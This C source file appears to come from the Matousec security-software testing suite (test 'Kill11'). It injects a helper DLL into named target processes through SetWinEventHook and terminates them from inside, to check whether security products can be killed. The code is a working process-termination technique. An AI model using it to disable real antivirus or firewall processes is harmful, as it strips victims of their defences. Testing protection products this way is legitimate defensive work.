/*

 Security Software Testing Suite - Kill11 (termination test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This technique is also used by Simple Process Termination - Method 14, written by System Safety Limited.


 Method description:

   * Windows API SetWinEventHook allows applications to install an event hook and define
     a handler routine for it. A handler routine is a part of DLL, which is loaded to the process
     in which the event was hooked.

   * This tests attempts to inject helper DLL "killdll.dll" to the target processes using event hooks.
     When the target process loads the helper DLL, it terminates the target process from inside.

   * This test works with a list of processes and reports success if at least one process was terminated.


 Known issues and warnings:

   * After termination attempts, this test waits for a while to give the target process a chance to terminate.
     During this time no new process should be started, otherwise there is a chance to receive false negative results.

*/


#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"


int main(int argc,char **argv)
{
  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  COM_CONF conf;
  if (!com_console_init_main("Kill11","kill11",argc,argv,&conf,COM_TEST_TYPE_KILL11)) return 1;

  char *used_dlls[]={"user32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;


  HMODULE helper_dll=LoadLibrary("killdll.dll");
  if (helper_dll)
  {
    if (com_verbosity_get()) printf("Helper DLL loaded at 0x%p.\n",helper_dll);

    void *callback=GetProcAddress(helper_dll,"WinEventProc");
    if (callback)
    {
      if (com_verbosity_get()) printf("\"WinEventProc\" found in the helper DLL at 0x%p.\n\n",callback);

      HWINEVENTHOOK hooks[conf.processes_cnt];
      int hooks_cnt=0;

      ULONG pids[conf.processes_cnt];
      int ret=com_proc_get_pids_from_names(conf.processes,pids,conf.processes_cnt,&err_inf);
      if (ret)
      {
        for (int i=0;i<conf.processes_cnt;i++)
        {
          hooks[i]=NULL;
          ULONG pid=pids[i];

          if (pid!=COM_CID_INVALID)
          {
            if (com_verbosity_get()) printf("Process \"%s\" found with PID %ld.\n",conf.processes[i],pid);

            HWINEVENTHOOK hook=SetWinEventHook(EVENT_MIN,EVENT_MAX,helper_dll,callback,pid,0,WINEVENT_INCONTEXT);
            if (hook)
            {
              if (com_verbosity_get()) printf("Hook installed to process \"%s\" (PID %ld).\n",conf.processes[i],pid);

              hooks[i]=hook;
              hooks_cnt++;
            } else com_err_set_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX,"Unable to install windows hook to process \"%s\" (PID %ld).\n",
                                           conf.processes[i],pid);

            if (com_verbosity_get()) printf("\n");
          } else if (ret) fprintf(stderr,"ERROR: Unable to find process \"%s\".\n\n",conf.processes[i]);
        }
      }

      if (hooks_cnt)
      {
        printf("Hooks installed, try to work with the target processes in next 20 seconds to terminate them.\n\n");
        Sleep(20000);
      }

      res=com_proc_termination_report(conf.processes,pids,conf.processes_cnt,&err_inf);

      for (int i=0;i<conf.processes_cnt;i++)
        if (hooks[i]!=NULL)
          UnhookWinEvent(hooks[i]);

    } else com_err_set(&err_inf,"Unable to find function \"WinEventProc\" in \"killdll.dll\".\n");

    FreeLibrary(helper_dll);
  } else com_err_set(&err_inf,"Unable to load library \"killdll.dll\".\n");


  return com_end(res,&err_inf,&conf);
}
